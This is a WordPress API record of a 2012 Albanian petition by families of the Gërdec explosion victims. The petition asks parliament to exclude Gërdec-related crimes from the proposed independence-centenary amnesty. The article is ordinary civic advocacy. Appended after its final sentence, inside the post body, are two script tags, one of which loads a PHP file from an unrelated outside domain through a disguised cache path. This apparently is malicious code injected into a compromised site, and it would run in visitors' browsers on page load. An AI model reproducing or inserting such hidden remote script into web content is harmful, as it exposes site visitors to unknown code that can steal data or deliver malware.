{"id":460,"date":"2012-12-10T09:35:25","date_gmt":"2012-12-10T07:35:25","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=460"},"modified":"2013-09-30T09:36:50","modified_gmt":"2013-09-30T07:36:50","slug":"amnisti-pa-u-dhene-drejtesi-eshte-bashkefajesi-ne-krim","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=460","title":{"rendered":"Amnisti pa u dh\u00ebn\u00eb drejt\u00ebsi, \u00ebsht\u00eb bashk\u00ebfaj\u00ebsi n\u00eb krim"},"content":{"rendered":"<p>hoqata\u00a0 e Familjar\u00ebve t\u00eb Viktimave t\u00eb G\u00ebrdecit me an\u00eb t\u00eb nj\u00eb peticioni, i b\u00ebn thirrje Kuvendit q\u00eb t\u00eb vler\u00ebsoj\u00eb me kujdes amnistin\u00eb e propozuar p\u00ebr miratim, me rastin e nj\u00ebqind vjetorit t\u00eb pavar\u00ebsis\u00eb.<\/p>\n<p>N\u00eb draftin e k\u00ebsaj amnistie, shohim se autor\u00ebt tregojn\u00eb qart\u00eb se nuk kan\u00eb m\u00ebsuar asgj\u00eb nga tragjedia e G\u00ebrdecit. Amnistia nga nj\u00ebra an\u00eb ka p\u00ebrfshir\u00eb shum\u00eb ulje d\u00ebnimesh, por nga ana tjet\u00ebr ka p\u00ebrjashtuar disa krime t\u00eb r\u00ebnda, autor\u00ebt e t\u00eb cil\u00ebve nuk do p\u00ebrfitojn\u00eb asnj\u00eb ulje. Mir\u00ebpo k\u00ebtu nuk jan\u00eb p\u00ebrjashtuar edhe nenet 282 dhe 289 t\u00eb Kodit Penal q\u00eb p\u00ebrkthehen n\u00eb \u201cShkelje t\u00eb rregullave mbi l\u00ebnd\u00ebt plas\u00ebse, djeg\u00ebse dhe radioaktive\u201d, dhe \u201cShkelje e rregullave t\u00eb mbrojtjes n\u00eb pun\u00eb.\u201d. K\u00ebto jan\u00eb dy veprat penale kryesore q\u00eb sipas gjykat\u00ebs jan\u00eb konsumuar nga t\u00eb pandehurit kryesor\u00eb t\u00eb G\u00ebrdecit.<\/p>\n<p>Po k\u00ebshtu jan\u00eb harruar t\u00eb p\u00ebrjashtohen nga amnistia edhe neni 161 \u201cShkat\u00ebrrimi i pron\u00ebs nga pakujdesia\u201d, apo dhe neni 70\/2 i Kodit Penal Ushtarak q\u00eb b\u00ebn fjal\u00eb p\u00ebr \u201cShp\u00ebrdorimin e detyr\u00ebs nga personeli ushtarak\u201d.<\/p>\n<p>N\u00ebse procesi n\u00eb Gjykat\u00ebn e Apelit Tiran\u00eb p\u00ebrfundon deri m\u00eb 28 n\u00ebntor 2012, amnistia do t\u00eb ul\u00eb shum\u00eb vjet nga d\u00ebnimi p\u00ebr t\u00eb d\u00ebnuarit e mundsh\u00ebm. Por edhe n\u00ebse nuk do arrij\u00eb kjo amnisti t\u00eb aplikohet direkt p\u00ebr procesin \u201cG\u00ebrdeci\u201d pasi ky mund t\u00eb zgjatet p\u00ebrtej 28 n\u00ebntorit, ne ju b\u00ebjm\u00eb thirrje deputet\u00ebve q\u00eb t\u00eb vler\u00ebsojn\u00eb drejt pesh\u00ebn e atyre veprave penale q\u00eb kan\u00eb treguar n\u00eb praktik\u00eb se mund t\u00eb marrin edhe dhjet\u00ebra jet\u00eb njer\u00ebzish.\u00a0 K\u00ebto nene jan\u00eb lar\u00eb me gjak t\u00eb pafajsh\u00ebm dhe nuk mund t\u00eb trajtohen si krime t\u00eb lehta p\u00ebr tu amnistuar, sado fest\u00eb t\u00eb ket\u00eb Shqip\u00ebria. Amnistia nuk parashikon p\u00ebrfitim as p\u00ebr krime ku e ku m\u00eb t\u00eb lehta sic jan\u00eb aksidentet rrugore me plagosje t\u00eb lehta, nd\u00ebrkoh\u00eb q\u00eb krimeve t\u00eb r\u00ebnda si ai i G\u00ebrdecit po i jep nj\u00eb shans. Me an\u00eb t\u00eb k\u00ebsaj amnistie nuk b\u00ebhet gj\u00eb tjet\u00ebr vecse jepet mesazhi i pamoralsh\u00ebm se vrasja e nj\u00eb fshati t\u00eb t\u00ebr\u00eb \u00ebsht\u00eb e par\u00ebnd\u00ebsishme n\u00eb nj\u00eb shoq\u00ebri demokratike.<\/p>\n<p>Gjithashtu shqet\u00ebsohemi me t\u00eb drejt\u00eb edhe p\u00ebr amnistimin e veprave penale, t\u00eb cilat kan\u00eb nisur t\u00eb ndiqen me nism\u00ebn e t\u00eb d\u00ebmtuarve akuzues sic \u00ebsht\u00eb plagosja e r\u00ebnd\u00eb. Kjo vep\u00ebr penale, ndon\u00ebse n\u00eb dukje \u00ebsht\u00eb m\u00eb e leht\u00eb, \u00ebsht\u00eb e pamoralshme q\u00eb pas 3 vjet\u00ebsh endje gjyqeve ato t\u00eb mbyllen me rastin e nj\u00eb feste.<\/p>\n<p>P\u00ebr k\u00ebto arsye k\u00ebrkojm\u00eb me forc\u00eb q\u00eb amnistia t\u00eb mos fal\u00eb asnj\u00eb vep\u00ebr penale q\u00eb lidhet me G\u00ebrdecin. Kuvendi \u00ebsht\u00eb ende n\u00eb koh\u00eb q\u00eb t\u00eb riparoj\u00eb k\u00ebt\u00eb gabim n\u00eb draftin e paraqitur.<\/p>\n<p>Sado e r\u00ebnd\u00ebsishme t\u00eb jet\u00eb festa e 100 vjetorit t\u00eb pavar\u00ebsis\u00eb, amnistia e propozuar, n\u00ebse nuk riparohet, do t\u00eb jet\u00eb thjesht nj\u00eb pjat\u00eb e sh\u00ebmtuar p\u00ebr t\u00eb zbukuruar tavolinat e nj\u00eb dite ku do t\u00eb hahet drejt\u00ebsia me turp e buk\u00eb.<script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>hoqata\u00a0 e Familjar\u00ebve t\u00eb Viktimave t\u00eb G\u00ebrdecit me an\u00eb t\u00eb nj\u00eb peticioni, i b\u00ebn thirrje Kuvendit q\u00eb t\u00eb vler\u00ebsoj\u00eb me [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":461,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6,5],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/460"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=460"}],"version-history":[{"count":1,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/460\/revisions"}],"predecessor-version":[{"id":462,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/460\/revisions\/462"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/461"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=460"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=460"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=460"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}